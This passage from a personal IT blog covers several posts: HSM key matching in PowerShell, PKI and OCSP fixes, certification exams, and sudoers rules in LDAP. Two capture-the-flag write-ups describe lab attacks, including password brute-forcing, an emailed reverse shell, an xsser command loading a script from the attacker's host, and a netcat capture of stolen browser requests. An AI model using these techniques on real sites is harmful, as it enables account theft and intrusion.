ForEach ($KMData in $KeyFiles) {
               $CONT=(kmfile-dump -p $KMData | Select -First 7 | Select -Last 1)
               Write-Output "$KMData $CONT";
}

 

For example, output for the previous example would be:

TESTBOX F34F7A37C39255FA7E007AE68C1FE3BD92603A0D "CN=testbox, C=thomas, C=NL" "ThomasTest"

C:ProgramData CipherKey Management DataLocalkey_caping_machine--a45b47a3cee75df2fe462521313eebe9ef5ab4                    ThomasTest

 

The first line is for host TESTBOX and it shows the certificate for the testbox certificate, with a link to the ThomasTest container. The second line shows the specific kmdata file that is tied to the ThomasTest container. Nice :)


kilala.nl tags: , , ,

View or add comments (curr. 0)

Matching Windows certificates to nShield protected keys (kmdata)

2018-05-22 18:39:00

Over the past few weeks I've had a nagging question: Windows certutil / certlm.msc has an overview of the active certificates and key pairs for a computer system, but when your keys are protected by an Thales nShield HSM you can't get to the private keys. Fair enough. But then there's the %NFAST_KMDATA% directory on the nShield RFS-server, whose local subdirectory contains all of the private keys that are protected by the HSM. And I do mean all the key materials. And those files are not marked in easy to identify ways. 

So my question? Which of the files on the %NFAST_KMDATA%/local ties to which certificate on which HSM-client?

I've finally figured it all out :) Let's go to Powershell!

 

PS C:Windowssystem32> cd cert:LocalMachineMy

PS Cert:LocalMachineMy> dir
   Directory: Microsoft.PowerShell.SecurityCertificate::LocalMachineMy

Thumbprint                                Subject
----------                                -------
F34F7A37C39255FA7E007AE68C1FE3BD92603A0D  CN=testbox, C=thomas, C=NL
...

 

So! After moving into the "Personal" keystore for the local system you can see all certs by simply running dir. This will show you both the thumbprint and the Subject of the cert in question. Using the Powershell Format-List command will show you the interesting meta-info (the example below has many lines remove).

 

PS Cert:LocalMachineMy> dir F34F7A37C39255FA7E007AE68C1FE3BD92603A0D | fl *
...
DnsNameList              : {testbox}
...
HasPrivateKey            : True
PrivateKey               :
PublicKey                : System.Security.Cryptography.X509Certificates.PublicKey
SerialNumber             : 6FE2C038ED73E7A0469E5E3641BD3690
Subject                  : CN=testbox, C=thomas, C=NL

 

Cool! Now, the two bold-printed, underlined lines are interesting, because the system tells you that it does have access to the relevant private key, but it does not have clear informatin as to where this key lives. We can turn to the certutil tool to find the important piece to the puzzle: the key container name

 

PS Cert:LocalMachineMy> certutil -store My F34F7A37C39255FA7E007AE68C1FE3BD92603A0D
...
Serial Number: 6fe2c038ed73e7a0469e5e3641bd3690
Subject: CN=testbox, C=thomas, C=NL
 Key Container = ThomasTest
 Provider = nCipher Security World Key Storage Provider
Private key is NOT exportable
... 

Again, the interesting stuff is bold and underlined. This shows that the private key is accessible through the Key Storage Provider (KSP) "nCipher Security World KSP" and that the relevant container is named "ThomasTest". This name is confirmed by the nShield command to list your keys:

 

PS Cert:LocalMachineMy> cnglist --list-keys
ThomasTest: RSA machine
...

 

Now comes the tricky part: the key management data files (kmdata) don't have a filename tying them to the container names:

 

PS Cert:LocalMachineMy> cd 'C:programdata CipherKey Management DataLocal'

PS C:programdata CipherKey Management DataLocal> dir
...
-a---        27-12-2017     14:03       5336 key_caping_machine--...
-a---        27-12-2017     14:03       5336 key_caping_machine--...
-a---        27-12-2017     11:46       5336 key_caping_machine--...
-a---         15-5-2018     13:37       5188 key_caping_machine--a45b47a3cee75df2fe462521313eebb1e9ef5ab4...

 

So, let's try an old-fashioned grep shall we? :)

 

PS C:programdata CipherKey Management DataLocal> Select-String thomastest *caping_*
key_caping_machine--a45b47a3cee75df2fe462521313eebb1e9ef5ab4:2:   ThomasTest  ?   ∂   Vu ?{?%f?&??)?U;?m???   ??  ??  ??  1???B'?????'@??I?MK?+9$KdMt??})???7?em??pm?? ?

 

This suggests that we could inspect the kmdata files and find out their key container name. 

 

PS C:programdata CipherKey Management DataLocal> kmfile-dump -p key_caping_machine--a45b47a3cee75df2fe462521313eebe9ef5ab4
key_caping_machine--a45b47a3cee75df2fe462521313eebb1e9ef5ab4
 AppName
       caping
 Ident
       machine--a45b47a3cee75df2fe462521313eebb1e9ef5ab4
 Name
       ThomasTest
...

SHAZAM! 

Of course we can also inspect all the key management data files in one go:

 

PS: C:> $Files = Get-ChildItem 'C:ProgramData CipherKey Management DataLocalkey_caping*'

PS: C:> ForEach ($KMData in $Files) {kmfile-dump -p $KMData | Select -First 7)
C:ProgramData CipherKey Management DataLocalkey_caping_machine--a45b47a3cee75df2fe462521313eebe9ef5ab4
 AppName
       caping
 Ident
       machine--a45b47a3cee75df2fe462521313eebb1e9ef5ab4
 Name
       ThomasTest

 


kilala.nl tags: , ,

View or add comments (curr. 0)

Microsoft OCSP Responders, nShield HSMs and vagueries

2018-05-17 20:18:00

Over the past few months I've built a few PKI environments, all based on Microsoft's ADCS. One of the services I've rolled out is the Microsoft OCSP Responder Array: a group of servers working together to provide OCSP responses across your network. 

I've run into some weirdness with the OCSP Responders, when working with the Thales / nCipher nShield HSMs. For example, the array would consist of a handful of slaves and one master server. Everything'd be running just fine for a week or so, until it's time to refresh the OCSP signing certificates. Then, one out of the array starts misbehaving! All the other nodes are fine, but one of'm just stops serving responses. 

The Windows Event Log contains error codes involving “CRYPT_E_NO_PROVIDER”, “NCCNG_NCryptCreatePersistedKey existing lock file” and "The Online Responder Service could not locatie a signing certificate for configuration XXXX. (Cannot find the original signer)". Now that second one is a big hint!

I haven't found out why yet, but the problem lies in lock files with the HSM's security world. If you check %NFAST_KMDATA%local you'll find a file with "lock" at the end of its name. Normally when requesting a keypair from the HSM, a temporary lock is created which gets removed once the keypair is provided. But for some reason the transaction doesn't finish and the lock file stays in place.

For now, the temporary solution is to:

  1. Stop the Online Responder Service.
  2. Remove the lock file from %NFAST_KMDATA%local.
  3. Restart the Oniine Responder Service

With that out of the way, here's two other random tidbits :)

In some cases the service may throw out errors like "Online Responder failed to create an enrollment request" in close proximity to "This operation requires an interactive window station". This happens when you did not setup the keys to be module-protected. The service is asking your HSM for its keys and the HSM is in turn asking you to provide a quorum of OCS (operator cards). If you want the Windows services to auto-start at boot time, always set their keys up as "module protected". And don't forget to run both capingwizard64.exe and domesticwizard64.exe to set this as the default as well!

Finally, from this awesome presentation which explains common mistakes when building an AD PKI: using certutil -getreg provides boatloads of useful information! For example, in order for OCSP responses to be properly signed after rolling over your keypairs, you'll need to certutil -setreg caUseDefinedCACertInRequest 1.

(Seriously, Mark Cooper is a PKI wizard!)


kilala.nl tags: , ,

View or add comments (curr. 0)

CompTIA PenTest+ experience

2018-04-16 12:55:00

I've taken the day off, despite things being quite busy at the office, to have a little fun. Specifically, I've just arrived back home after sitting the CompTIA PenTest+ Beta exam. Taking an exam for fun? Absolutely :)

It's no surprise that I first heard about the newly developed exam on Reddit, with the CompTIA team calling for 400 people to take the beta-version of the exam. We're not getting any scores yet, as they'll first tally all the outcomes to determine weaknesses and flaws in questions that may affect scoring negatively. But once the process has completed, if (and that's an IF) you passed you'll gain full accreditation for the cert. All that and a fun day, for just $50? Sign me up :)

Being a non-native english speaker I was given an extension, tackling 110 questions in 220 minutes (instead of 165). That was certainly doable: I got up from my seat with two hours gone. Overall I can say that my impression of the exam is favorable! While one or two specific topics may have stolen the limelight, I can say that my exam covered a diverse array of subjects. The "simulation" questions as they call them were, ehh, okay. They're not what I would call actual simulations, they're more like interactive screens, but I do feel they added something to the experience. 

Yeah! Not bad at all! I would heartily endorse this certification track instead of EC Council's CEH. The latter may have better brand-recognition in EMEA, but CompTIA is still known as a respectable organization. 

So, did I pass? I don't know :) As I said, the subject matter turned out to be very diverse, in a very good way. Thus it also covered things I have zero to very little experience with, while an experienced pen-tester would definitely know. And that's the point: despite passing the OSCP exam last year, I -am- still a newbie pen-tester. So if I fail this exam, then I'll feel that it's a justified failure. 


kilala.nl tags: ,

View or add comments (curr. 2)

Cincero CTF036 - 2018 edition

2018-04-01 13:16:00

The battlegrounds

Image credits go to Cincero, who took photos all day.

Another year, another CTF036! No longer under the Ultimum flag, but this time organised by Cincero / Secured by Design. Same awesome people, different company name. The 2016 and 2017 editions were awesome and this year's party lived up to its fame.

As is tradition, the AM was filled with presentations. I was invited to talk as well, but I didn't have anything presentable ready to go; maybe next year! It was a busy day, and Wesley kicked off with DearBytes' findings about the security of home automation systems. Good talk, which had my colleague Dirk's attention because his home is pretty heavily filled with that stuff ;)

Dick and I would be teaming up under the Unixerius flag. Lunch was sorted pretty quickly, so we set up our systems around 12:30. Between us two we had three laptops, with my burner laptop serving as Google-machine through my mobile data connection (the in-house Internet connection wasn't very fast). The casus was consistent with the last years: a description of the target, an explanation why we were hacking their servers and a few leads to get us started. To sum it up:

First order of business: slurp down anything the DNS would give us (a successful zone transfer showed just the four systems, spread across two ranges) and run some port scans against the front two boxen. Results?

While perusing the website, we found a number of valid email addresses for employees to try on Squirrelmail. After going over my old OSCP notes, Dick put together a userlist and got to work with Hydra in hopes of brute-forcing passwords for their accounts. This is where the basic Kali stuff isn't sufficient: there are no wordlists for Dutch targets :) While rockyou.txt is awesome, it won't contain famous passwords such as Welkom01, Maandag2018, Andijvie18 and so on. It's time to start putting together a set of rules and wordlists for Dutch targets! In the end we got into two mailboxes, which got us another seven cards: 140 points. 

Unfortunately we didn't get any points beyond that, despite trying a lot of avenues!

Open SMB shares: Dirk suspected there was more to the open SMB shares, so he focused on those. Turning to Metasploit and others, he hoped to perform a SMB relay attack using the MSF tooling. Michael later confided that EternalBlue would not work (due to patching), but that the SMB redir was in fact the way to go. Unfortunately Dick couldn't get this one to work; more troubleshooting needed. 

Squirrelmail REXEC: Dick noticed that the Squirrelmail version was susceptible to a remote command execution vulnerability. Unfortunately, after quite a bit of trying he concluded that this particular install had been patched. Darn!

Mailing a script: In his own presentation Michael had stressed the importance of simulating human interaction in a CTF, be it through automation or by using a trainee ;) After the rather hamfisted hints in the Squirrelmail boxes we'd opened, Dick decided to look for a Powershell reverse-shell script and to mail it to the guy waiting for "a script to run". Not one minute before the final bell of the CTF did he get a reverse session! It didn't count for points, but that was a nice find of him. 

SQLi in the site: I ran the excellent SQLMap against all forms and variables that I could find in the site. No inroads found. 

XSS in the site: Michael pointed out that one variable on the site should catch my eye, so I went over it all again. Turns out that hoedan.php?topic= is susceptible to cross-site scripting. This is where I needed to start learning, because I'm still an utter newb at this subject. I expected some analogue of SQLMap to exist for XSS and I wasn't wrong! XSSER is a great tool that automates hunting for XSS vulnerabilities! Case in point:

xsser -u "http://www.pay-deal.nl" -g "/hoedan.php?topic=XSS" --auto --Fr "https://172.18.9.8/shell.js"
...
===========================================
[*] Final Results:
===========================================
- Injections: 558
- Failed: 528
- Sucessfull: 30
- Accur: 5 %

Here's a great presentation by the author of XSSER: XSS for fun and profit.

This could be useful! Which is why I tried a few avenues. Using XSSER, Metasploit and some manual work I determined that the XSS wouldn't allow me to run SQL commands, nor include any PHP. Javascript was the thing that was going to fly. Fair enough. 

Now, that website contained a contact form which can be used to submit your own website for inclusion in the payment network. Sounds like a great way to get a "human" to visit your site. 

Browser_autopwn: At first, I used SEToolkit and MSF to run attacks like browser_autopwn2, inserting my own workstations webserver and the relevant URL into the contact form. I certainly got visits and after some tweaking determined that the user came from one of the workstations and was running FireFox 51. Unfortunately, after trying many different payloads, none of them worked. So no go on pwning the browser on the workstation. 

Grabbing dashboard cookies: Another great article I found helped me get on the way with this one: From reflected XSS to shell. My intention was to have the pay-deal administrator visit their own site (with XSS vuln), so I could grab their cookie in hopes of it having authentication information in there. Basically, like this:

http://www.pay-deal.nl/hoedan.php?topic=Registreren”>

While the attack worked and I did get a cookie barfed onto my Netcat listener, it did not contain any authenticating information for the site:

===========================================
connect to [172.18.9.8] from (UNKNOWN) [172.18.8.10] 55469
GET / HTTP/1.1
Host: 172.18.9.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: nl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
=========================================== 

Turns out I probably did something wrong, because according to Michael's post-CTF talk this was indeed the inroad to be taken: grab the admin's cookie, login to the dashboard, grab more credit cards and abuse the file upload tool for more LFI fun! Similarly, Dick's attempts at the SMB relay should have also given him inroads to attack the box. We were well on our way, after a bunch of hints. So, we're still pretty big newbs :D

It was an awesome day! I wish I had more spare time, so I could continue the PWK/OSCP online labs and so I could play around with HackTheBox and VulnHub.

EDIT: Here's a great SANS article explaining SMB relay in detail.


kilala.nl tags: , ,

View or add comments (curr. 0)

Back in the saddle:CompTIA PenTest+

2018-03-25 20:54:00

It's been a few months since I last took a certification exam: I closed last year with a speed-run of RedHat's EX413, which was a thrill. Since then, I've taken some time off: got into Civ6, read a few books, caught up on a few shows. But as some of my friends will know, it's never too long before I start feeling that itch again... Time to study!

A few weeks back I learned of the new CompTIA PenTest+ certification. They advertised their new cert with a trial run for the first 400 takers. A beta-test of an exam for $50?! I'm game! Sounds like a lot of fun!

Judging by the reactions on TechExams and Reddit, the test is hard to pin down. CompTIA themselves boast "a need for practical experience", while also providing a VERY extensive list of objectives. Seriously, the list is huge. Reports from test-takers are also all over the place: easy drag-and-drop "simulations", large swathes of multiple-choice questions, a very large focus on four of the big names in scripting, "more challenging than I had expected", or "what CEH should have been".

As for me, my test is booked for 16/04. I don't fully know what to expect, but I intend to have fun! In the mean time I'm using the large list of objectives to simply learn more abou the world of pentesting. My OSCP-certification suggests that I at least understand the basics, but to me it's mostly shown me how much I don't know :) 


kilala.nl tags: ,

View or add comments (curr. 0)

PasswordState, Active Directory and Sudo: oh my!

2018-01-10 20:14:00

Recently I've gone over a number of options of connecting a Linux environment in an existing Active Directory domain. I won't go into the customer's specifics, but after considering Winbind, SSSD, old school LDAP and commercial offerings like PBIS we went with the modern-yet-free SSSD-based solution. The upside of this approach is that integration is quick and easy. Not much manual labor needed at all. 

What's even cooler, is that SSSD supports sudoers rulesets by default!

With a few tiny adjustments to your configuration and after loading the relevant schema into AD, you're set to go! Jakub Hrozek wrote instructions a while back; they couldn't be simpler!

So now we have AD-based user logins and Sudo rules! That's pretty neat, because not only is our user management centralized, so is the full administration of Sudo! No need to manage /etc/sudoers and /etc/sudoers.d on all your boxen! Config management tools like Puppet or Ansible might make that easier, but one central repo is even nicer! :D

 


 

Now, I've been working with the PasswordState password management platform for a few weeks and so far I love it. Before getting the logins+Sudo centralized, getting the right privileged accounts on the Linux boxen was a bit of a headache. Well, not anymore! What's even cooler, is that using Sudo+LDAP improves upon a design limitation of PasswordState!

Due to the way their plugins are built, Click Studios say you need -two- privileged accounts to manage Linux passwords (source, chapter 14). One that has Defaults:privuser rootpw in sudoers and one that doesn't. All because of how the root password gets validated with the heartbeat script. With Sudoers residing in LDAP this problem goes away! I quote (from the sudoers.ldap man-page):

It is possible to specify per-entry options that override the global default options. /etc/sudoers only supports default options and limited options associated with user/host/commands/aliases. The syntax is complicated and can be difficult for users to understand. Placing the options directly in the entry is more natural.

Would you look at that! :) That means that, per the current build of PasswordState, the privileged user for Linux account management needs the following three sudoers entries in AD / LDAP. 

CN=pstate-ECHO,OU=sudoers,OU=domain,OU=local:
sudoHost = ALL
sudoCommand = /usr/bin/echo
sudoOption = rootpw
sudoUser = pstate

CN=pstate-PASSWDROOT,OU=sudoers,OU=domain,OU=local:
sudoHost = ALL
sudoCommand = /usr/bin/passwd root
sudoOption = rootpw
sudoOrder = 10
sudoUser = pstate

CN=pstate-PASSWD,OU=sudoers,OU=domain,OU=local:
sudoHost = ALL
sudoCommand = /usr/bin/passwd *
sudoUser = pstate

The "sudo echo" is used to validate the root password (because the rootpw option is applied). I only applied the rootpw option to "sudo passwd root" to maintain compatibility with the default script included with PasswordState


kilala.nl tags: , ,

View or add comments (curr. 1)

EX413: it's been one heck of a ride!

2017-11-01 20:39:00

2017-11-02: Updates can be found at the bottom.

Five weeks ago, I started a big challenge: pass the RedHat EX413 "certificate of excellence" in Linux server hardening. I've spent roughly sixty hours studying and seven more on the exam, but I've made it! As this post's title suggests it's been one heck of a ride!

Unfortunately, that's not just because of the hard work. 

I prepared for the exam by following Sander van Vugt's Linux Security Hardening video training, at SafariBooks Online. Sander's course focuses on both EX413 and LPI-3 303, so there was quite some material which did not apply to my specific exam. No worries, because it's always useful to repeat known information and to learn new things. Alongside Sander's course I spent a lot of time experimenting in my VM test lab and doing more research with Internet resources. Unfortunately I found Sander's course to be lacking content for one or two key areas of EX413. We have discussed the issues I had with his training and he's assured me that my feedback will find its way into a future update. Good to know. 

Taking the exam was similar to my previous RedHat Kiosk experiences. Back in 2013 I was one of the first hundred people to take a Kiosk exam in the Netherlands (still have the keychain lying around somewhere) and the overall experience is still the same. One change: instead of the workstation with cameras mounted everywhere, I had to work with a Lenovo laptop (good screen, but tiny fonts). The proctor via live chat was polite and responded quickly to my questions.

Now... I said I spent seven hours on the exam: I took it twice. 

Friday 27/10 I needed the full four hours and had not fully finished by the time my clock reached 00:00. This was due to two issues: first, Sander's course had missed one topic completely and second, I had a suspicion that one particular task was literally impossible. Leaving for home, I had a feeling that it could be a narrow "pass". A few hours later I received the verdict: 168/300 points, with 210 being the passing grade. A fail.

I was SO angry! With myself of course, because I felt that I'd messed up something horribly! I knew I hadn't done well, but I didn't expect a 56% score. I put all that anger to good use and booked a retake of the exam immediately. That weekend I spent twelve hours boning up on my problem areas and reviewing the rest.

Come Monday, I arrived at the now familiar laptop first thing in the morning. BAM! BAM! BAM! Most of the tasks I was given were hammered out in quick succession, with a few taking some time because of lengthy command runtimes. In the end I had only one task left: the one which I suspected to be impossible. 

I spoke to the proctor twice about this issue. The first time (1.5 hours into the test) I provided full details of the issue and my explanation for why the task is impossible. The proctor took it up with RedHat support and half an hour later the reply was "this is as intended and is a problem for you to solve". Now I cannot provide you with details about the task, so I'll give you an analogy instead. Task: "Here's a filled-out and signed form. And over here you will find the personnel files for a few employees. Using the signature on the form, ascertain which employee signed the form. Then use his/her personal details to set up a new file.". However, when inspecting the form, you find the signature box to be empty. Blank. There is no signature. 

After finishing all other work I spoke to the proctor again, to reiterate my wish for RedHat to step in. The reply was the same: it works as intended and complaints may be sent to certification-team@. Fine. Since I'd finished all other tasks (and rebooted at least six times along the way to ensure all my work was sound), I finished the exam assuming I'd get a passing score anyway. I felt good! I'd had a good day, banged out the exam in respectable time and I had improved upon my previous results a lot!

I took their suggestion and emailed the Cert Team about the impossible question. Both to help them improve their exams and to get a few extra points on my final score.

A few hours later I was livid.

The results were in: 190/300 points: 63%, where 70% is needed for a pass. All my improved work, with only one unfinished task, had apparently only led to 22pts increase?! And somewhere along the way RedHat says I just left >30% of my points lying around?! No fscking way. 

I sent a follow-up to my first email, politely asking RedHat to consider the impossible assignment, but also to give my exam results a review. I sincerely suspect problems with the automated scoring on my test, because for the life of me I cannot imagine where I went so horribly wrong to miss out on 30% of the full score!

This morning, twentyfour hours after my last email to the Cert Team, I get a new email from the RH Exam Results system. My -first- exam was given a passing score of 210/300. No further feedback at all, just the passing score on the first sitting. 

While I'm very happy to have gotten the EX413, this of course leaves me with some unresolved questions. All three have been fired in RedHat's direction; I hope to have some answers by the end of the week. 

 

In closing I'd like to say that, despite my bad experiences, I still value RedHat for what they do. They provide solid products (RHEL, IDM/IPA and their many other tools) and their practical exams are important to a field of work rife with simple multiple-choice questions. This is exactly why my less-than-optimal experience saddens me: it marrs the great things Redhat do!

 

Update 2017-11-02:

This morning I received an email from the Certification Team at RedHat, informing me that my report of the bugged assignment was warranted. They had made an updates to the exam which apparently had not been fully tested, allowing the problem I ran into to make it into the production exams. RedHat will be A) updating the exam to resolve the issue B) reissuing scores for other affected candidates. 


kilala.nl tags: , ,

View or add comments (curr. 12)

EX413 prep: my cheat sheet

2017-10-29 12:56:00

I used Sander van Vugt's EX413/LPI3 video training to prep for my EX413 exam and expanded upon all that information by performing additional research. All in all, I've spent roughly sixty hours over the past five weeks in order to get up to speed. Over the course, over fifty pages of notes were compiled. :)

I've extract all the really important information from my notes, to make this seven-page EX413 cheat sheet. I hope other students find it useful.

Of course, this is NO SUBSTITUTE for doing your own studying and research. Be sure to put in your time, experimenting with all the software you'll need to know. The summary is based on my own knowledge and experience, so I'm sure I've left out lots of things that other people might need to learn.


kilala.nl tags: , ,

View or add comments (curr. 0)

RHEL / CentOS / Fedora: NetworkManager or dhclient messing with network and DNS settings?

2017-10-28 08:53:00

In my test networks at home I've often run into issues with NetworkManager or dhclient messing with my network settings, most importantly the DNS configuration. Judging by the hundreds of StackExchange and other forum posts to the same effect, I'm certainly not alone. The fact that this seems like such a newbie problem just makes it all the more annoying. 

I've tried many changes, based on those forum discussions, such as:

And funnily enough, things would still be changing my /etc/resolv.conf every time networking was restarted.

Turns out that I am in fact making a RedHat-newbie mistake! I'm stuck in my old ways of manually micro-managing specific settings of a Linux box. I'm so stuck that I've forgotten my lessons from the RHCSA certification: system-config-network-tui

That tool is great at resetting your network config and overwriting it with the exact setup you want. It helps clear out any settings in odd places that might lead to the continuous mucking about with your settings. 


kilala.nl tags: , ,

View or add comments (curr. 0)

PvIB CTF 2017: pen.test event

2017-10-08 10:29:00

the scoreboard

For the third year in a row I competed in the PvIB CTF "Pen.test event", a Jeopardy-style CTF where contestants race to solve puzzles and small hacking challenges. Last year I didn't fare very well at all, but this time aroud things went great! The crowd was nice, my table companions were cool, it was great talking to Anko again and the DJ played awesome beats. I had a blast!

Around 1.5 hours into the competition I went to stretch my legs and get a drink, enjoying the fun we were having. Looking around, sipping on my cola I noticed something odd about the scoreboard! When I'd managed to grab my phonecam I'd already been surpassed by one team, but for at least a short while I'd managed to be in #4 out of the pack of 51 contestants. In the end I finished somewhere halfway , because greater minds than mine managed to keep on scoring points :)

pvib ctf scoreboard

Like before, the challenges were divided into various categories (shown above) and ranked from easy to hard, resulting in different scores per item. I finished the night with 100.000 points (3x10e3, 2x10e4, 1x10e3). I was so, so close on another 10k and 30k points which is why I stuck around until the very last minute!

Web:

  1. I let myself be fooled by the easy Web challenge for way too long. The challenge presented you with a SquirrelMail login page and the task to login and get their email. Assuming it was a veritable SquirrelMail, I assumed no easy software vulnerabilities would be found, so I resorted to password guessing. An hour before the end of the night, Anko asked me "When we start out web pen testing, what are the things you're taught first?". Me: "Well... I reckon... You mean XSS, CSRF and SQL Injection, right?" A: "Absolutely." Me: "Sonuvabitch...". Turns out it was NOT SquirrelMail, just a quick and easy SQLi exercise made to look like it. 
  2. This challenge sent you to an online calculator which would help the voting committee tally their votes, in this case a basic formula line which would return the outcome. Entering gibberish into the line would return a basic Python EVAL failure. Turns out that it was possible to run OS-commands through the EVAL calculation line, which let me list the remote files and to grab the required flag.
  3. Both this exercise and #2 were a bit slow to respond in my browser, so I turned to the Lynx text-based browser. This foregoes all CSS, which was being loaded from the Internet. This time around we were supposed to hack a voting system, to find out the vote-total for each candidate. I noticed that it was based on a JSP that got included by URL, so I downloaded it for further analysis. This code showed me that the voting process makes SOAP calls to retrieve candidates and to place a vote. I also gave me examples of the XML data needed for those soap calls. From here on out, my challenge was to find out how to get voting results instead! I haven't worked with SOAP a lot, but I know there had to be some way of querying the remote end for available procedures and commands. This is where I learned about WSDL, which gave me exactly what I needed: a description of how to request voting results. This needed a little bit more tweaking to the XML, because the candidates were identified by an MD5 hash that needed to be updated as binary data. Darn! Was this close to getting the whole challenge, but was a few minutes too late. 

Learning on the go was hella fun! I got to renew my experience with CURL calls and XML data and learned new things about SOAP. Nice!

Crypto:

  1. I'd figured out the positional encryption scheme for this challenge pretty quickly, as it was clearly based on jumping and looping through the ASCII table, based on a character's position. Despite this, I seem to have had some stupid mistake in my method, because my decrypted text was repeatededly rejected. Again, this close to cracking it, but too little too late. 
  2. We were provided with two enigmatic strings and an encrypted ZIP file. Had no idea how to proceed with this one just yet.
  3. We're provided with Python code for a home-brew crypto, as well as some sample data. Given enough time I'm sure I could have figured out the issue at hand, but in this case ${ENOUGH_TIME} would -GT 2d. So never mind ;)

Cracking crypto never was my strong point ;)

Forensics:

  1. We're given a .CRT certificate for a voting machine, which supposedly is fishing. Making it legible with the OpenSSL command line quickly shows the PvIB CTF flag.
  2. We're given a .DOCX file which was supposed to contain suspicious data. I simply used unzip to extract all the components files of the Word document and searched the various XML contents for the CTF flag. 
  3. We're given a .PNG image that supposedly contains hidden data. One ZSteg install later I have my flag. 

Fun challenges! Not too hard so far.

Misc.:

  1. A PDF file with some hidden data in it. Open the PDF with the viewer on my Kali box made it stand out as a fat blue box. Anko simply grepped for "-i pvib" through the strings-output of the PDF and fared just as well :)
  2. Oooff! I wish I'd had my wife with me! She's great at logical reasoning :) This challenge combined logic (determine whether persons A, B and C are lying or tell the truth), math (Fibonacci and Harshad numbers) and programming (because there's no plausible way of quickly solving the puzzle on paper). Seeing how I can't ever get my ideas straight with the liars/truthers, I skipped this one after about half an hour. 

What a great evening! Better yet, on the way home I managed to get on the Slam! night show and I won a DAB+ radio for our home! :D Awesome-cakes!


kilala.nl tags: , ,

View or add comments (curr. 0)

WTF HP? Your M203dn laser printer defaults to open SNMP write?!

2017-10-04 18:13:00

screenshot from the web interface

We've just bought a new laser printer, mostly for my daughter's schoolwork. Installation was a snap as both Windows and MacOS have made it a fool-proof process. MacOS even gave me a button labeled "Visit printer website"! Of course that's gonna pique my interest!

Yup, the HP Laserjet Pro M203dn (as it's fully named) has a wonderfully helpful web interface! By default, there's no username or password, there's no login prompt whatsoever. Just open for everyone to browse. Which is where I stumble upon the screenshot I'm showing above. Of course the SNMP community strings default to public/public. Why not? But who in the seven hells decided to make that SNMP daemon -writable-?! That's asking for trouble!

... aside from the "no username or password on the admin panel" of course. Ye gods! O_o

Oh and of course the certificate on the https web server was not signed by HP's CA. Because of course I wouldn't want to verify that nobody messed with the firmware or the certs on the printer. 

... *checks around* Yep, HP also don't have a bug bounty program. =_=


kilala.nl tags: ,

View or add comments (curr. 1)

EX413 prep: messing with FreeIPA, Apache Directory Studio and MacOS

2017-10-01 21:44:00

Messing with FreeIPA

In preparation for my upcoming EX413 examination, I'm mucking about with FreeIPA

FreeIPA is a easy-to-setup solution for building the basis of your corporate infrastructure on Linux. It includes an LDAP server, it sets up DNS and a CA (certificate authority) and it serves as Kerberos server. Basically, it's a light version of Active Directory, but targeted at Linux networks. Of course Linux can use AD just fine, but if you don't have AD FreeIPA is the next best thing.

IPA has come a long way over the past ten years. It might still not be fully featured, but it certainly allows you to setup a centralized RBAC platform, not unlike the BoKS product range I've worked with. BoKS offers more functionality (like a password safe and the possibility to easily filter SSH subsystems like allowing SCP or SFTP only), but it's also far from free. 

I'm currently doing exactly what EX413 exams want you to be able to do: install a basic FreeIPA environment, with some users and some centralized SUDO rules. It's the latter that was giving me a little bit of a headache, because I had a hard time figuring out the service account to use for the bind action. Sander van Vugt's training video refers to the service account uid=sudo,cn=sysaccounts,dc=etc,dc=ex413,dc=local, which does not appear to exist out of the box. 

This set me off one a foxhunt that lasted 1.5 hours.

Because this is a sandbox environment, I've set up one account as both the SUDO bind user in /etc/sudo-ldap.conf and in the ADS user interface. Both now work swimmingly! I can "sudo -l" as a normal user and I can mess around the LDAP tree from the warmth and comfort of my MacOS desktop :)

EDIT:

Well I'll be a monkey's uncle! That little rascal of a UID=sudo was hiding inside LDAP all along! I guess I really did make a mistake in my initial ldappasswd command :D Well, at least I learned a thing or two!

EDIT 2:

FOUND IT! The OID I showed up top has an "s" too many! I wrote "sysaccountS", while it's supposed to be "sysaccount". Ace! That's going to make life a lot easier during the exam :)  


kilala.nl tags: , ,

View or add comments (curr. 0)

Speedrunning Redhat's EX413 exam

2017-09-21 15:16:00

booking confirmation

Over the past few weeks, I've been setting up a pen-testing coaching track for ITGilde. I'd planned my agenda for Q3/Q4/Q1 accordingly and had even accepted that my RHCSA and RHCE certifications would lapse in November. Unfortunately I couldn't get enough students together for this winter, so I'm putting the coaching track off until next spring. Huzzah, this frees up plenty of time for studying!

So... Now I'd like to try and retain my Redhat certs, for which I've worked so hard! My deadline's pretty close though, as November's right around the corner. After some investigation I concluded that the most productive way for me to retain these certs, would be through passing one of the RHCA exams. EX413, pertaining to server security, is right up my alley! So, I'll be speedrunning the EX413 studies, trying to finish it all in five weeks time!

I love a good challenge! ^_^


kilala.nl tags: , ,

View or add comments (curr. 2)

Building an on-premise Stratum-1 NTP server

2017-08-11 13:59:00

Recently I've been poking around NTP time servers with a few friends. Our goal was to create an autonomous, reliable and cheap NTP box that could act as an on-premise, in-house Stratum-1 time server. In a world filled with virtual machines that don't have their own hardware clocks, but whose applications demand very strict timekeeping, this can be a godsend.

I could write pages upon pages of what we've done, but the RPi Fatdog blog has a great article on the subject

Using just one Raspberry Pi and a reliable RTC (real-time clock) module you can create an inexpensive time server for your network. The RTC they're referring to supposedly drifts about a minute per year; still not awesome, but alright. *

This setup works well and Windows servers will happily make use of it! Linux NTP clients and other, stricter NTP software will balk at the fact that your Stratum-1 box was never synchronized with another time source. This is proven by the ntpdate command refusing to sync:

$ ntpdate timeserver
4 Mar 12:27:35 ntpdate[1258]: no server suitable for synchronization found

If you turn on the debugging output for ntpdate, you'll see an error that the reference time for the host is in 1900, which is the Epoch time for NTP. The example below shows reftime (though not in 1900):

ntpq>rv
status=0664 leap_none, sync_ntp, 6 events, event_peer/strat_chg
system="UNIX", leap=00, stratum=2, rootdelay=280.62,
rootdispersion=45.26, peer=11673, refid=128.4.1.20,
reftime=af00bb42.56111000  Fri, Jan 15 1993  4:25:38.336, poll=8,
clock=af00bbcd.8a5de000  Fri, Jan 15 1993  4:27:57.540, phase=21.147, freq=13319.46, compliance=2

The quick and easy work-around for this issue is to simply create both Stratum-1 and 2 in-house :) Have one RPi run as S-1, with 2 or 3 RPis working as S-2, that sync their time off the S-1 and who are peered among themselves. Any NTP client will then happily accept your S-2 boxes as NTP source. 

Better than nothing! And cheap to boot. 

 

